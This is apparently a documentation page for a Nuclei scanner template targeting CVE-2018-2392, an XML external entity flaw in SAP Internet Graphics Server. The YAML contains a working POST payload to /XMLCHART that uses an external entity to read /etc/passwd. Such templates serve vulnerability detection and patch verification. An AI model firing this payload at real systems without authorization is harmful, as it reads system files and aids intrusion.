SAP Internet Graphics Server (IGS) - XML External Entity Injection
ID: CVE-2018-2392
Severity: high
Author: _generic_human_
Tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive
Description
Section titled “Description”SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
YAML Source
Section titled “YAML Source”id: CVE-2018-2392
info: name: SAP Internet Graphics Server (IGS) - XML External Entity Injection author: _generic_human_ severity: high description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise. remediation: | Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet. reference: - https://launchpad.support.sap.com/#/notes/2525222 - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/ - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ - https://troopers.de/troopers18/agenda/3r38lr/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb - https://nvd.nist.gov/vuln/detail/CVE-2018-2392 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 epss-score: 0.00278 epss-percentile: 0.64901 cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: internet_graphics_server tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive
http: - raw: - | POST /XMLCHART HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary={{randstr_1}}
--{{randstr_1}} Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml" Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?> <ChartData> <Categories> <Category>ALttP</Category> </Categories> <Series label="{{randstr_4}}"> <Point> <Value type="y">12345</Value> </Point> </Series> </ChartData> --{{randstr_1}} Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml" Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8'?> <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]> <SAPChartCustomizing version="1.1"> <Elements> <ChartElements> <Title> <Extension>&xxe;</Extension> </Title> </ChartElements> </Elements> </SAPChartCustomizing> --{{randstr_1}}--
matchers-condition: and matchers: - type: word part: body words: - Picture - Info - /output/ condition: and
- type: word part: body words: - ImageMap - Errors condition: or
- type: word part: header words: - text/html - SAP Internet Graphics Server condition: and
- type: status status: - 200
# file name - /etc/passwd# digest: 4a0a00473045022100c1200fb90152a16dbc981fd2b6e0326c3dde1d787cdb190b1dc86d6e78253f0c02204bef66cc66feb2b3418e6d99523be1388e18b56bb044e9633aa9a998dda0480d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-2392.yaml"